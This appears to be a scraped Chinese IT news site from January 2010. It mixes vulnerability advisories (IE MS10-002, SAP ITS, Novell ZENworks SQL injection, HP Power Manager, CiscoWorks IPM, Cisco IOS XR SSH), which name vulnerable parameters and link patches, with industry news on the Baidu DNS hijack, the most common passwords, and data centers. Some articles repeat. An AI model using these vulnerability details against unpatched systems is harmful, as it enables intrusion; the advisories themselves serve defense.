Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。 * 将Internet 和本地Intranet安全区域设置设为“高”，以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。 * 对Internet Explorer 6或Internet Explorer 7启用DEP。 厂商补丁： Microsoft --------- Microsoft已经为此发布了一个安全公告（MS10-002）以及相应补丁: MS10-002：Cumulative Security Update for Internet Explorer (978207) 链接：http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true MS10-002,Microsoft,IE,标签,缓存,代码 漏洞公告 admin 绿盟科技 2010-01-25 16:28 http://www.serversteam.com/S/News/news-20100122631.html 通常在人们的印象中，最常见的是网站服务器遭到黑客攻击。而一周前，百度遭首页被黑的原因却是百度域名解析遭到不法分子恶意篡改。据说百度域名解析出错后，该公司即动员员工采用人 通常在人们的印象中，最常见的是网站服务器遭到黑客攻击。而一周前，百度遭首页被黑的原因却是百度域名解析遭到不法分子恶意篡改。据说百度域名解析出错后，该公司即动员员工采用人肉传播方式，建议用户采用直接输入IP地址或使用 com.cn等其他域名的方式登录……可以想见百度当时的窘状。 通常在人们的印象中，最常见的是网站服务器遭到黑客攻击。而一周前，百度遭首页被黑的原因却是百度域名解析遭到不法分子恶意篡改。据说百度域名解析出错后，该公司即动员员工采用人肉传播方式，建议用户采用直接输入IP地址或使用 com.cn等其他域名的方式登录……可以想见百度当时的窘状。 最新的消息是百度已在美国纽约向将域名服务商Register.com告上法庭。但即便法院最终判决域名注册服务商赔偿损失，也难以弥补百度域名被黑事件给网民心理造成的巨大冲击。 另一方面，最近闹得沸沸扬扬的谷歌退出事件，也让不少网站开始考虑怎么过好离开搜索引擎的日子。尤其是对于一些服务性的网站来说，尽管谷歌的市场份额并不高，但实际上有效的用户却多数来自谷歌。毕竟很多网民习惯于搜索关键字，通过点击搜索链接到达目标网站，不管谷歌退与不退都将深刻地影响产业布局。在keso博文里，他表示谷歌退出将导致互联网环境进一步恶化。事实上，随着互联网竞争的加剧和全民应用，均衡势力的任何大变动都将导致局面的失衡。 于是乎，百度被黑谷歌欲退无疑都像是在业内投入了一块又一块的石头，其激起的波浪会很长一段时间内不断鼓荡。 一个明显的案例就是支付宝。最近有媒体报道，支付宝近期欲将启用zhifubao.com作为新域名。这像是对百度、谷歌事件的一个回应。从近的来看，多个域名（据悉还有zhifu.com）有助于降低对单一域名的依赖度，远的来看，支付宝似乎已经在做“脱搜索”的准备。 如果归纳一下支付宝启用新域名zhifubao.com的好处，笔者以为有以下几点： 一、好记，拼写容易 理由：支付宝致力于为中国电子商务提供应用服务，主体用户绝大多数是熟悉拼音读写的中国人。以前用户花了几年时间都可能记不住的www.alipay.com，如今几秒钟就能轻松记住zhifubao.com，而且很难遗忘。 二、安全，互为备用 理由：尽管支付宝域名www.alipay.com存在用户拼写较为困难的问题，但用户耳闻目睹并使用多了，还是有了一定的群众基础。倘若今后支付宝遭遇百度域名被劫持的类似问题，两个域名可以互为备用，也算为网站域名的安全措施上了一道双保险。 三、品牌，拓展市场 理由：品牌是一种无形资产，他的载体是名称、设计组合等，增值的源泉来自于消费者心智中形成的关于其载体的印象。相对于能够产生音义协同效应的支付宝zhifubao.com，已有品牌“支付宝Alipay.com”就要大打折扣。而一个公司拓展市场的杀手锏，不正是借助于品牌背后的产品及服务超越竞争对手吗？ 而支付宝现用域名alipay.com带有鲜明的阿里特征，由于用户拼读困难，已成为考验无数网民记忆的老大难问题。倘有一个好记的域名（如支付宝 zhifubao.com），这样的难题自然就迎刃而解了。当然，zhifubao.com没有谷歌中国G.cn域名简短；但从域名释义上来看，支付宝新域名比G.cn要稍胜一筹。如此一来，支付宝启用新域名zhifubao.com将是一举多得的好事情，又何乐而不为呢？ 来自Whois查询结果显示，zhifubao.com和zhifu.com两个域名目前确实已经归阿里巴巴持有。很明显，这两个不错的域名必然会被启用，剩下的都是时间问题。在支付宝的带头作用下，预计会有更多公司购买此类网站域名。这么一来，域名交易恐怕又将成为近期互联网界的焦点之一。 有句话是这么说的，上帝给你关上一扇门，也会给你开启一扇窗。无论百度被黑或谷歌欲退算不算动了中国互联网的门，但主动去开启另一扇窗还是非常必要的。 百度,被黑,谷歌,欲退,网站,换名 行业资讯 admin 未知 2010-01-22 10:59 http://www.serversteam.com/S/News/news-20100122630.html 每经记者 宛霞 发自北京 在同一航线上，各航空公司和代理商默认的价格同盟真的不能捅破吗？随着机票热销的春运时期临近，一些逆市推出特价机票的航空公司和机票代理近日却惨遭封杀。 每经记者 宛霞 发自北京 在同一航线上，各航空公司和代理商默认的“价格同盟”真的不能捅破吗？随着机票热销的春运时期临近，一些逆市推出特价机票的航空公司和机票代理近日却惨遭封杀。 机票代理遇“黑客” 1月21日，在线旅游网站易网通游易向《每日经济新闻》爆料称，其订票网站被“黑”：只要打开网站首页，就会出现其他机票代理商的电话或电子票务网的移动式广告，且无法删除，悬挂在网站页面的广告严重影响了旅客查询和订票。 记者随后登录该网站发现，当打开页面时弹出了 “**机场电子票务网”的广告，并出现其他机票代理商的订票电话。游易旅行网市场总监王一力告诉记者，这应该是“黑代理”使用流氓软件侵入游易网、引导登录网站的消费者通过其他途径订票所致。他介绍说，除了北京，游易在多个城市的次级服务商近日相继投诉，网站均受到黑客攻击。目前游易已派出专家前往各省市进行处理。 至于网站被黑的原因，王一力表示，或许与游易网在本月16日开始推出的“超低价”春节机票有关。“游易几乎相当于‘零利润’ 的低价春节机票是‘赔本赚吆喝’。”北京顺鑫机票代理的负责人告诉记者，在春运代理都难以拿到折扣机票的时候，逆市推出“返现活动”简直有“血拼”的意味。 记者在游易网发现，在所有实时机票价格的后面，都会有一个“返现金额”，即使在春节前一周，该网站仍然推出了六七折的机票，折扣后还能返现。由返现金额推算，优惠幅度大约是标准机票价格的3%左右，相当于将航空公司给机票代理人的折扣直接返给了旅客。 与之相对应的是，航空公司2月初开始的机票价格开始上调，2月10日前后的热门航班更是打出全价。 为节省成本，各航空公司均在直销上发力。而新浪、搜狐、腾讯、百度、淘宝等行业巨头相继加入在线旅游业务并提供机票查询服务，使得老牌机票代理网站渐渐感到压力增大。 捅破价格同盟 海航被“封杀” 除了游易，近期由于低价促销春运机票而遇到麻烦的还有海南航空。不同的是，海航将要面对的是多家航空公司。记者调查后发现，截至21日，成都多家代理机构仍无法出海航的机票。 此次“封杀”的缘由在于海南航空推出的7条由成都出港至北京、深圳、海口、宁波、西安等地的特价优惠机票，折扣幅度低至2.4折至3.5折。这一打破 “价格同盟”的举动，引发了国航、川航、东航、南航等公司的反击。航空公司集体要求各机票代理人停止售卖海航及其集团旗下多家航空公司的机票。而各机票代理人由于不愿得罪三大航，只得“从命”。 据最新消息称，中国民航西南管理局已介入调查协调此事。 逆市,特价,机票,旅游网,被黑 行业资讯 admin 未知 2010-01-22 10:58 http://www.serversteam.com/S/News/news-20100122629.html 每经记者宛霞发自北京 在同一航线上，各航空公司和代理商默认的价格同盟真的不能捅破吗？随着机票热销的春运时期临近，一些逆市推出特价机票的航空公司和机票代理近日却惨遭封杀。 每经记者宛霞发自北京 在同一航线上，各航空公司和代理商默认的“价格同盟”真的不能捅破吗？随着机票热销的春运时期临近，一些逆市推出特价机票的航空公司和机票代理近日却惨遭封杀。 机票代理遇“黑客” 1月21日，在线旅游网站易网通游易向《每日经济新闻》爆料称，其订票网站被“黑”：只要打开网站首页，就会出现其他机票代理商的电话或电子票务网的移动式广告，且无法删除，悬挂在网站页面的广告严重影响了旅客查询和订票。 记者随后登录该网站发现，当打开页面时弹出了“**机场电子票务网”的广告，并出现其他机票代理商的订票电话。游易旅行网市场总监王一力告诉记者，这应该是“黑代理”使用流氓软件侵入游易网、引导登录网站的消费者通过其他途径订票所致。他介绍说，除了北京，游易在多个城市的次级服务商近日相继投诉，网站均受到黑客攻击。目前游易已派出专家前往各省市进行处理。 至于网站被黑的原因，王一力表示，或许与游易网在本月16日开始推出的“超低价”春节机票有关。“游易几乎相当于‘零利润’的低价春节机票是‘赔本赚吆喝’。”北京顺鑫机票代理的负责人告诉记者，在春运代理都难以拿到折扣机票的时候，逆市推出“返现活动”简直有“血拼”的意味。 记者在游易网发现，在所有实时机票价格的后面，都会有一个“返现金额”，即使在春节前一周，该网站仍然推出了六七折的机票，折扣后还能返现。由返现金额推算，优惠幅度大约是标准机票价格的3%左右，相当于将航空公司给机票代理人的折扣直接返给了旅客。 与之相对应的是，航空公司2月初开始的机票价格开始上调，2月10日前后的热门航班更是打出全价。 为节省成本，各航空公司均在直销上发力。而新浪、搜狐、腾讯、百度、淘宝等行业巨头相继加入在线旅游业务并提供机票查询服务，使得老牌机票代理网站渐渐感到压力增大。 捅破价格同盟海航被“封杀” 除了游易，近期由于低价促销春运机票而遇到麻烦的还有海南航空[6.84 -2.15%]。不同的是，海航将要面对的是多家航空公司。记者调查后发现，截至21日，成都多家代理机构仍无法出海航的机票。 此次“封杀”的缘由在于海南航空推出的7条由成都出港至北京、深圳、海口、宁波、西安等地的特价优惠机票，折扣幅度低至2.4折至3.5折。这一打破“价格同盟”的举动，引发了国航、川航、东航、南航等公司的反击。航空公司集体要求各机票代理人停止售卖海航及其集团旗下多家航空公司的机票。而各机票代理人由于不愿得罪三大航，只得“从命”。 据最新消息称，中国民航西南管理局已介入调查协调此事。 逆市,特价,机票,众怒,被黑 行业资讯 admin 未知 2010-01-22 10:57 http://www.serversteam.com/S/News/news-20100122628.html １月２２日电 据英国《每日电讯报》２１日报道，互联网数据应用安全公司Ｉｍｐｅｒｖａ通过研究数千万网友的网络账号信息，总结出１０大最常用网络密码。这家公司建议，由于这些密码 １月２２日电　据英国《每日电讯报》２１日报道，互联网数据应用安全公司Ｉｍｐｅｒｖａ通过研究数千万网友的网络账号信息，总结出１０大最常用网络密码。这家公司建议，由于这些密码容易被人盗用，网友应尽量避免使用。     Ｉｍｐｅｒｖａ２１日公布的１０大最“烂”密码分别为：１２３４５６、１２３４５、１２３４５６７８９、Ｐａｓｓｗｏｒｄ、ｉｌｏｖｅｙｏｕ、ｐｒｉｎｃｅｓｓ、ｒｏｃｋｙｏｕ、１２３４５６７、１２３４５６７８和ａｂｃ１２３。     这家公司的技术总监阿米凯·舒尔曼说：“每个人都应意识到，使用这些差劲密码在当今世界就意味着必将遭受网络攻击。‘黑客’只消使用一点精力，就可以在１秒钟内攻击一个新账户。换句话说，‘黑客’每１７分钟可以攻击１０００个（使用烂密码的）账户。”     计算机“黑客”去年１２月袭击社交网站“ＲｏｃｋＹｏｕ”并获取这家网站３２００万名用户的信息。Ｉｍｐｅｒｖａ公司随后对这份遭泄露的账号信息展开分析，总结出上述１０大最危险密码。     “举例说，如果公司职员在登录脸谱社交网站时都使用同一个密码，那么这家公司的网络系统安全恐怕会受到连累，尤其当这个密码是‘１２３４５６’一类容易被击破的字符串时，”舒尔曼说，“网络密码安全问题在过去２０年间没有取得多少改善，眼下每名网民都应重视密码安全，这是保证数据安全的第一步。” 常见，密码,遭黑客攻击 行业资讯 admin 未知 2010-01-22 10:47 http://www.serversteam.com/S/News/news-20100122627.html 123456是当今最流行密码 据《纽约时报》当地时间20日报道，在互联网初期，最流行的账户密码是12345，现在最流行的账户密码则是更长但却不会更安全的123456。 尽管最近一些年来关于网络侵入 “123456”是当今最流行密码 据《纽约时报》当地时间20日报道，在互联网初期，最流行的账户密码是“12345”，现在最流行的账户密码则是更长但却不会更安全的“123456”。 尽管最近一些年来关于网络侵入窃取账号的新闻报道不绝于耳，但很多人对此还是反应冷淡。 根据最新分析报告，五分之一的网络使用者仍然让自己的密码容易被窃取，他们选择一个诸如“abc123”、“iloveyou”、 “password”等简单易猜的密码来保护自己的账户。 “我想这是人性的弱点。”防黑客软件公司Imperva技术主管阿米亥·苏尔曼说。“自上个世纪90年代以来，一直都没有变。” 苏尔曼和他的公司上个月检查了3200万个被未知黑客窃取的密码。 这份密码清单被贴在网上，黑客和安全研究人员都下载了它。这为研究电脑使用者的习惯提供了非同寻常的详细数据。过去，只有类似联邦调查局和国家安全局这样的机构才有机会得到这样大规模的密码清单。 他们发现，在上述密码清单中，近1%是“123456”，数量最多，其次是“12345”。 更令人不安的是，苏尔曼说，大约20%的用户使用的密码集中在5000个雷同密码上。这就意味着黑客只要尝试最流行的密码就能轻易破解大量账户。由于电脑和网络速度加快，黑客每分钟能够破解数千个密码。 过量使用简单密码不是一个新现象，在上个世纪90年代中期曾经做过一个相似的调查，当时发现最流行的密码分别是“12345”、“abc123”、“password”。 为什么这么多人不顾警告继续使用简单易猜的密码？安全专家认为，在这个数字年代，我们要记的密码10倍于10年前，我们被那些我们必须记住的数字压垮了。(颜丙文/编译) 大量,密码,简单,黑客 行业资讯 admin 未知 2010-01-22 10:44 http://www.serversteam.com/S/News/news-20100122626.html 新业务不断发展，要求不断提供新的计算能力，企业需要购买服务器，开发新的应用。但是对于数据中心管理而言，要添加一台新的服务器并不像看上去那么简单。 添加一台服务器，首先遇到 新业务不断发展，要求不断提供新的计算能力，企业需要购买服务器，开发新的应用。但是对于数据中心管理而言，要添加一台新的服务器并不像看上去那么简单。 添加一台服务器，首先遇到问题是在哪里添加部署这台服务器?也就是要在数据中心的哪个机架来部署?这时候就要考虑这个机架是否有足够的空间，电源够不够用，以及制冷是否可以满足散热的需求。除此之外，还要考虑这个机架是否有足够的数据接口带宽，等等。不考虑这些因素，贸然在机架添加一台服务器将有可能引发“蝴蝶效应”，导致电源短路器跳闸、UPS过载、电源后备时间减少、冗余度降低等一系列问题。如果制冷不足，将导致服务器过热，使得服务器可用性降低，引发冗余服务器连锁反应，酿成无可挽回的灾难。 效率：数据中心的挑战 服务器添加所涉及的是数据中心高效管理的问题。在需要的时候、需要的地方、提供能够满足需要的电源、功率和制冷容量，要实现这样一个高效管理的目标并不简单。 谈到数据中心高效管理，APC全球英飞产品总监 Robert Bunger曾指出，软件方法显然比人工更具有效率。Bunger表示，APC为此提供了英飞集成中心管理软件(APC InfraStruXure Central)对数据中心物理基础设施管理(DCPIM)进行集中管理。 英飞集成中心管理软件将数据中心管理分为设备、监控、资产清单以及模拟建模四个层面。其中，设备管理是将网络、服务器以及存储等硬件进行集中的监控和管理，对硬件运行状况、工作温度进行监控，发现问题及时给出预警以减少硬件故障的发生。监控管理则是针对数据中心用电、温度和湿度环境进行监控，通过对这些信息的监控，绘制数据中心的热成像模型，分析数据中心状况，对数据中心进行改造。资产管理则是针对数据中心的电源容量、制冷量以及空间情况进行集中管理，绘制诸要素之间的关联关系，为数据中心管理提供依据。这些信息将通过建模的方式，帮助管理人员提高数据中心的管理水平。 平衡：高效管理的选择 之所以要对数据中心管理大动干戈，源于数据中心节能已经成为社会问题，据APC大中华区市场副总裁 Francesco Quero透露，有资料显示，在过去的100年间，人类的电力支出大约有1万亿美元。但是随着社会的不断进步，电力消耗的速度也在激增，据预测未来用不了 20年时间，电力消耗就会达到1万亿美元，其中，中国、印度、俄罗斯等经济新兴国家将成为电力消耗大户，占有80%份额。因此，构建高效管理的数据中心已经成为一个有责任感的企业和用户应该高度重视的问题。 Bunger指出，所谓软件的方法就是要在高密度、高可用性以及高效率之间求得一个平衡。这个思路也得到了微软的认同。微软为此推出了Microsoft System Center数据中心管理套件，通过采集并汇总企业IT基础设施、策略、过程以及最佳实践的关键信息，帮助企业降低数据中心的管理成本。 据微软技术中心总监Chong Lee 透露，为了更好对微软软件产品提供支持，向用户展示微软软件产品技术功能，帮助用户以及合作伙伴提供解决方案测试环境。微软在位于望京商业中心的微软大厦构建了MTC(微软技术中心)，其数据中心面积大约1200平方米。机房面积虽然不大，但是需要部署大约60台服务器、500多个计算核心，容量大约40TB SAN存储系统，以及各种终端、网络和测试设备。借助此次MTC构建，微软对数据中心原有的服务器进行了整合，借助虚拟化的手段，提高数据中心计算资源、网络和存储资源的利用率。为保证数据中心的稳定、高效以及可用新，MTC采用了一体化机房设计。通过部署英飞行级制冷设备，借助软件的方法对数据中心进行管理。 Chong Lee表示，集成管理的软件方法是构建高效数据中心的关键。 随着虚拟化应用的日趋深入，数据中心基础设施管理矛盾将更加突出。专家指出，虚拟化虽可以减少物理服务器的用量，但计算密度也随之提高。虚拟化所具有的动态迁移的特性，也将导致数据中心“热点”不断漂移，功率密度、散热需求处于不断变化之中，如果数据中心不能针对这个特点，提供有针对性的制冷散热方案，那么数据中心的效率必然不高。要实现这样的目标，要求数据中心管理能够随时掌握数据中心环境温度、湿度以及功率密度的变化，并据此对UPS、空调设备进行调整。此外，以高计算密集度的刀片服务器应用为例，普通的冷热风通道分离的下送风方案是难以满足刀片散热需要的，就需要本着就近制冷的原则，提供高效制冷的解决方案，或者采用行级制冷，也可以根据需要采用水冷门的方案。 总之，高效数据中心管理需要引起用户足够的重视，而集成一体化的方案，软件方法是实现高效数据管理的有效保障。 添加,服务器 行业资讯 admin 未知 2010-01-22 10:43 http://www.serversteam.com/S/News/news-20100122625.html 面对服务器的持续商品化，今年IT厂商计划通过更加高度集成和统一化的计算平台来实现产品的差异化。 埃森哲公司的数据中心技术和运营总监Rockwell Bonecutter表示，这就意味着服务器，存储设 面对服务器的持续商品化，今年IT厂商计划通过更加高度集成和统一化的计算平台来实现产品的差异化。     埃森哲公司的数据中心技术和运营总监Rockwell Bonecutter表示，这就意味着服务器，存储设备，网络和相关管理软件结合在了一起。这种尝试类似于几年前厂商推出的模块化盒式数据中心的产品。不过这次厂商是通过专注于核心的数据中心基础架构来完善设计的。     对于集成系统来说，需要购买的不止是一台服务器，你还要购买整个基础架构来作为单一的管理平台来满足用户需求。系统必须是高度集成和高度可扩展的，系统需要包括计算，存储和网络系统，以及商业服务管理，自动化业务流程和配置能力。在某些情况下，这些系统可能还要包括电力传输和制冷设备。     当这些系统和虚拟化结合在一起后，融合后的系统就构成了私人云计算资源的基础。     Bonecutter认为这种方法解决了IT领域真正的痛处。"我大部分时间都在和首席信息官一起探讨如何部署云计算或者实施云计算的配置和流程"。     惠普公司行业化标准事业部副总裁Jim Ganthier认为惠普旗下的BladeSystem Matrix就是这种解决方案的翘楚。Ganthier表示Matrix可以允许管理员无需重新配置系统就能实现对插槽之间的刀片进行删除并重新插入，同时虚拟连接也可以确保存储和网络资源的迁移。     这款系统还可以根据需求调整工作负载均衡，实现能耗优化，使用或两者兼而有之的最优化效果。Ganthier表示使用Matrix产品"你的机箱就可以成为你的数据中心"。惠普还计划采用今年采用带有存储和交换机设备的惠普机架式服务器。     IBM公司也有类似的计划。IBM打算创建一个更加有效的集成系统，将每个设备都更加紧密的结合在一起。但是首席信息官们愿意从惠普或IBM购买他们所有的存储，服务器的网络设备来实现这个理念吗？     IBM公司X86服务器事业部基础架构和技术副总裁Tom Bradicich认为答案是肯定的。他表示X86平台的互换性会受到用户的欢迎。     Bradicich称，企业用户愿意用更高的价格去换取更加高效的系统-x86系统会成为用户的选择，用户可以从IBM购买集成产品包。     虽然Bradicich承认这种"互换性"优势还不那么完善，但他相信这是用户可以接受的，因为复杂的工作负载会让用户明白如何取舍。用户对系统的某些组成部分会有更高的容忍度。     戴尔公司也有类似的战略，不过他们倾向于把第三方的设备和技术支持结合为一体，并采取一个更加开放的标准化方式。戴尔企业产品部首席技术官保罗.普林斯表示"尽管我们使用不同种类的组件，但却可以用统一的方式进行管理"。     美国佛罗里达州塞米诺尔郡的IT服务总监罗伯特.贝驰表示，这是一个有趣的想法，但是他也无法肯定自己会锁定一家供应商来采购所有的设备。贝驰的想法是"对我来说，这种做法就像是把所有的鸡蛋都放在一个篮子里"。     史考特证券公司的首席信息官伊恩.帕特森负责经营一家非常大的数据中心，他也很关心产品的互换性和供应商的限制问题。但是帕特森表示"从长期来看前景是积极而光明的，原因很简单，就是对一种系统中的所有组件相互作用进行监控的能力"。     帕特森也预见到从这种系统中获取更佳性能的潜力将超过对整个网络中的设备进行管理的优势，不过他也表示现在下结论还言之过早。帕特森称 "在对一种可行性技术进行市场调研之前，我至少会提前一年进行观察研究"。 数据中心,样子,服务器 行业资讯 admin 未知 2010-01-22 10:41 http://www.serversteam.com/S/News/news-20100122624.html 一份新的报告显示，现在有15%的服务器是没有被充分利用的，这完全是浪费能源! 根据一项新的研究，世界各地数以百万计的服务器都在浪费能源。 由Kelton研究所的调查显示，至少有15%的服务 　一份新的报告显示，现在有15%的服务器是没有被充分利用的，这完全是浪费能源! 根据一项新的研究，世界各地数以百万计的服务器都在浪费能源。 由Kelton研究所的调查显示，至少有15%的服务器没有被服务器管理人员(数额为72%)充分利用。此外，83%的服务器管理人员表示，他们没有一个充分理解服务器利用率的概念，72%的管理人员仅依靠看CPU的利用率来作为他们界定服务器工作效率的准则。 未充分使用的服务器总价值估计达到247亿美元，其中包括硬件维护，管理，电源和未使用的服务器冷却所消耗的费用。 具体来说，该项研究的结论是，估计世界各地有475万的服务器正在运行的比例是24 / 7，管理和使用的升级不是每天都积极运行的。假设业务的成本约为每年每服务器4400美元(IDC的估计)，这些未充分使用的服务器运行费用为209亿美元，还要再加上约为38亿美元的能源开支。 这项研究是在9月被1E(1E是一个由提供软件和服务的供应商组成的，致力于帮助企业降低IT成本和能源消耗的联盟)所委托才进行的节能调查。 "极少的数据中心经理或服务器管理人员会将精力集中于提升已退役或现役服务器的利用率来摆脱现有的IT资源浪费"， 1E的首席执行官Sumir Karayi说道。 企业希望更多地关注到服务器效率和能源管理，但他们缺乏工具和程序，他说。例如，许多人都依赖于将CPU使用率来作为服务器利用率的衡量标准，但这是一个错误的做法。 "CPU利用率所反映的问题是，服务器正在忙碌着如下的工作，例如自身的防病毒扫描处理任务，自己的备份，自己的索引以及硬盘碎片整理等工作"，Karayi说。 "这看上去很忙，但它实际上没有增加任何商业价值。" 研究发现，超过半数的服务器管理人员(所占比例约为63%)依靠手工检查，验证和错误查询或是等到未使用的服务器真正出错的时候，才会发现问题。此外，75%的管理人员承认，他们公司将管理IT架构的任务，委托给能偶提供高层次IT服务，而且在国内获得测量的机构，并将这种托管作为提高服务器效率的一种方法。 1E的研究结果指出，建议企业能够使用配套的工具来监控服务器。NightWatchman的服务器管理工具提供了测量服务器的效率和功率使用程度的方法，帮助企业确定哪些服务器没有被充分使用，并且能够准确判断哪些服务器应该退役了。 该软件可以进行工作分析，以确定有多少有益的工作正在一个服务器中执行，它的能量消耗情况，以及是否有任何浪费。例如，IT管理员可以通过选择设立了"睡眠"状态，来停止无需用到的服务器功能，以降低能源消耗，而且也不会影响到服务器的正常应用，Karayi说。 "睡眠模式服务器管理器，使服务器消耗减少的同时，还依旧可以完成最创造效益的工作，'他说。"我们不会使服务器进入待机或休眠状态。服务器仍在工作，它只是运行慢一点而已。" 显示,充分,利用,服务器 行业资讯 admin 未知 2010-01-22 10:39 http://www.serversteam.com/S/Vuln/vuln_623.html 受影响系统： SAP Web Application Server 7.01 SAP Web Application Server 7.0 SAP Web Application Server 6.40 描述：BUGTRAQ ID: 37871 SAP Web应用服务器可给企业用户带来更高的互操作性和灵活性，为产品增加额外的Web服 受影响系统：     SAP Web Application Server 7.01     SAP Web Application Server 7.0     SAP Web Application Server 6.40 描述：BUGTRAQ  ID: 37871 SAP Web应用服务器可给企业用户带来更高的互操作性和灵活性，为产品增加额外的Web服务。 远程攻击者可以通过向SAP Web应用服务器的集成ITS组件提交恶意请求触发缓冲区溢出，导致执行任意代码。 <*来源：Mariano Nuñez Di Croce （mnunez@cybsec.com）     链接：http://secunia.com/advisories/38172/         http://marc.info/?l=bugtraq&m=126401417706856&w=2 *> 建议：厂商补丁： SAP --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： https://service.sap.com/sap/support/notes/1414112 SAP,Web应用,服务器,ITS,组件,溢出,漏洞 漏洞公告 admin 绿盟科技 2010-01-22 10:36 http://www.serversteam.com/S/Vuln/vuln_622.html 受影响系统： Novell ZENworks Asset Management 7.5 不受影响系统： Novell ZENworks Asset Management 7.5 Interim Release IR19 描述：BUGTRAQ ID: 37764 ZENworks是一套用于在组织内跨资源自动化IT管理和业务流程的工具。 受影响系统：     Novell ZENworks Asset Management 7.5 不受影响系统：     Novell ZENworks Asset Management 7.5 Interim Release IR19 描述：BUGTRAQ  ID: 37764 ZENworks是一套用于在组织内跨资源自动化IT管理和业务流程的工具。 ZENworks的docfiledownload组件没有正确的过滤用户在SQL查询请求中所提交的documentID参数，远程攻击者可以通过提交恶意请求执行SQL注入攻击，入侵基础数据库系统。 <*来源：ZDI （http://www.zerodayinitiative.com/）     链接：http://secunia.com/advisories/38147/         http://marc.info/?l=full-disclosure&m=126402834327766&w=2         http://www.novell.com/support/viewContent.do?externalId=7005128 *> 建议：厂商补丁： Novell ------ 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://download.novell.com/ Novell,ZENWorks,Asset,document 漏洞公告 admin 绿盟科技 2010-01-22 10:35 http://www.serversteam.com/S/Vuln/vuln_621.html 受影响系统： HP Power Manager 4.2.9 不受影响系统： HP Power Manager 4.2.10 描述：BUGTRAQ ID: 37873 CVE ID: CVE-2009-4000 HP Power Manager是基于Web的应用，允许管理员通过基于浏览器的控制台管理HP UPS。 HP Power 受影响系统：     HP Power Manager 4.2.9 不受影响系统：     HP Power Manager 4.2.10 描述：BUGTRAQ  ID: 37873 CVE ID: CVE-2009-4000 HP Power Manager是基于Web的应用，允许管理员通过基于浏览器的控制台管理HP UPS。 HP Power Manager没有正确的过滤提交给/goform/formExportDataLogs URL的参数，远程攻击者可以在请求中包含特制的fileName参数通过目录遍历攻击执行任意代码。 <*来源：Alin Rad Pop     链接：http://secunia.com/secunia_research/2009-48/         http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01971741&printver=true *> 建议：厂商补丁： HP -- HP已经为此发布了一个安全公告（HPSBMA02485）以及相应补丁: HPSBMA02485：SSRT090252 rev.1 - HP Power Manager, Remote Execution of Arbitrary Code 链接：http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01971741&printver=true 补丁下载： http://h18004.www1.hp.com/products/servers/proliantstorage/power-protection/software/power-manager/pm3-dl.html formExport,DataLogs,目录,遍历,漏洞 漏洞公告 admin 绿盟科技 2010-01-22 10:34 http://www.serversteam.com/S/Vuln/vuln_620.html 受影响系统： HP Power Manager 4.2.9 不受影响系统： HP Power Manager 4.2.10 描述：BUGTRAQ ID: 37866 CVE ID: CVE-2009-3999 HP Power Manager是基于Web的应用，允许管理员通过基于浏览器的控制台管理HP UPS。 HP Power 受影响系统：     HP Power Manager 4.2.9 不受影响系统：     HP Power Manager 4.2.10 描述：BUGTRAQ  ID: 37866 CVE ID: CVE-2009-3999 HP Power Manager是基于Web的应用，允许管理员通过基于浏览器的控制台管理HP UPS。 HP Power Manager没有正确的处理提交给/goform/formExportDataLogs URL的参数，远程攻击者可以在请求中包含超长的fileName参数触发栈溢出，导致执行任意代码。 <*来源：Alin Rad Pop     链接：http://secunia.com/secunia_research/2009-47/         http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01971741&printver=true *> 建议：厂商补丁： HP -- HP已经为此发布了一个安全公告（HPSBMA02485）以及相应补丁: HPSBMA02485：SSRT090252 rev.1 - HP Power Manager, Remote Execution of Arbitrary Code 链接：http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01971741&printver=true 补丁下载： http://h18004.www1.hp.com/products/servers/proliantstorage/power-protection/software/power-manager/pm3-dl.html HP,Manager,formExportDataLogs, 漏洞公告 admin 绿盟科技 2010-01-22 10:33 http://www.serversteam.com/S/Vuln/vuln_619.html 受影响系统： Cisco CiscoWorks IPM 2.6 Cisco CiscoWorks IPM 2.5 Cisco CiscoWorks IPM 2.4 描述：BUGTRAQ ID: 37879 CVE ID: CVE-2010-0138 CiscoWorks网间性能监控（IPM）是用于度量网络响应时间和可用性的故障排除应用程序 受影响系统：     Cisco CiscoWorks IPM 2.6     Cisco CiscoWorks IPM 2.5     Cisco CiscoWorks IPM 2.4 描述：BUGTRAQ  ID: 37879 CVE ID: CVE-2010-0138 CiscoWorks网间性能监控（IPM）是用于度量网络响应时间和可用性的故障排除应用程序。 Windows平台的CiscoWorks IPM在处理CORBA GIOP请求时存在缓冲区溢出漏洞，未经认证的远程攻击者可以通过发送特制的CORBA GIOP请求触发异常，导致在受影响的Windows系统中以SYSTEM权限执行任意代码。 <*来源：TippingPoint （http://www.tippingpoint.com/）     链接：http://www.cisco.com/warp/public/707/cisco-sa-20100120-ipm.shtml *> 建议：厂商补丁： Cisco ----- Cisco已经为此发布了一个安全公告（cisco-sa-20100120-ipm）以及相应补丁: cisco-sa-20100120-ipm：CiscoWorks Internetwork Performance Monitor CORBA GIOP Overflow Vulnerability 链接：http://www.cisco.com/warp/public/707/cisco-sa-20100120-ipm.shtml CiscoWorks,IPM,CORBA,GIOP,远程,溢 漏洞公告 admin 绿盟科技 2010-01-22 10:22 http://www.serversteam.com/S/Vuln/vuln_618.html 受影响系统： Cisco IOS XR 3.8.X Cisco IOS XR 3.7.X Cisco IOS XR 3.6.X Cisco IOS XR 3.5.X Cisco IOS XR 3.4.X 描述：BUGTRAQ ID: 37878 CVE ID: CVE-2010-0137 Cisco IOS XR Software是Cisco IOS Software产品家族的成员，使用基于微内核的 受影响系统：     Cisco IOS XR 3.8.X     Cisco IOS XR 3.7.X     Cisco IOS XR 3.6.X     Cisco IOS XR 3.5.X     Cisco IOS XR 3.4.X 描述：BUGTRAQ  ID: 37878 CVE ID: CVE-2010-0137 Cisco IOS XR Software是Cisco IOS Software产品家族的成员，使用基于微内核的分布式操作系统基础架构。 Cisco IOS XR Software的SSH服务器实现中的漏洞允许未经认证的远程用户导致拒绝服务。新的SSH处理器进程处理特制SSH v2报文时可触发这个漏洞，导致进程崩溃。在这个事件期间会耗尽大量内存，反复攻击可能影响其他系统功能，具体取决于可用内存大小和攻击持续时间。   